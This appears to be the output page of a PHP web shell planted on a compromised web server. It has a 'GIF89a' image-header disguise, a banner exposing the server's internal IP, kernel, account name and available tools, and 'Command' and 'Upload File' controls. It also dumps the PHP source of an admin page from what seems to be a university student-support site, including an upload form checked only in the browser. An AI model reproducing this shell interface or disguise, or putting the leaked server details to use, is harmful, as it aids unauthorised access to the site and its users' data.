GIF89a;
Server IP : 172.26.0.195 / Your IP : 18.188.227.192 Web Server : Apache System : Linux 43-205-77-33.cprapid.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64 User : jnclnmuac ( 1026) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jnclnmuac/public_html/web/../grievance/system/../../jnclnmu/admin/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include 'headerck.php';?> <div class="page-header page-header-light"> <div class="breadcrumb-line breadcrumb-line-light header-elements-md-inline"> <div class="d-flex"> <div class="breadcrumb"> <a href="#" class="breadcrumb-item"><i class="icon-stack"></i>Manage About Us</a> <span class="breadcrumb-item active">About Us</span> </div> <a href="#" class="header-elements-toggle text-default d-md-none"><i class="icon-more"></i></a> </div> </div> </div> <!-- /page header --> <?php include("connection.php"); $sql="select * from student_support where flag='c'"; $query_run=mysqli_query($dbCon, $sql); $result=mysqli_num_rows($query_run); if($result>0) { while($row=mysqli_fetch_array($query_run)) {?> <form action="all.php" method="POST"> <textarea name="editor" id="editor" cols="30" rows="10"> <?php echo $row['p_msg'] ?> </textarea><br> <input type="submit" name="c_update" value="Update Content" class="btn-success"> </form> <?php } } //} ?><br> <form action="all.php" method="POST" enctype="multipart/form-data"> Upload photo: (File Should Be in .jpg/.gif/.png Format)<input type="file" name="pimg" onChange="validextension1(this);"> <input type="submit" name="c_img" value="Update Image" class="btn-success"> </form> <?php include 'footerck.php';?>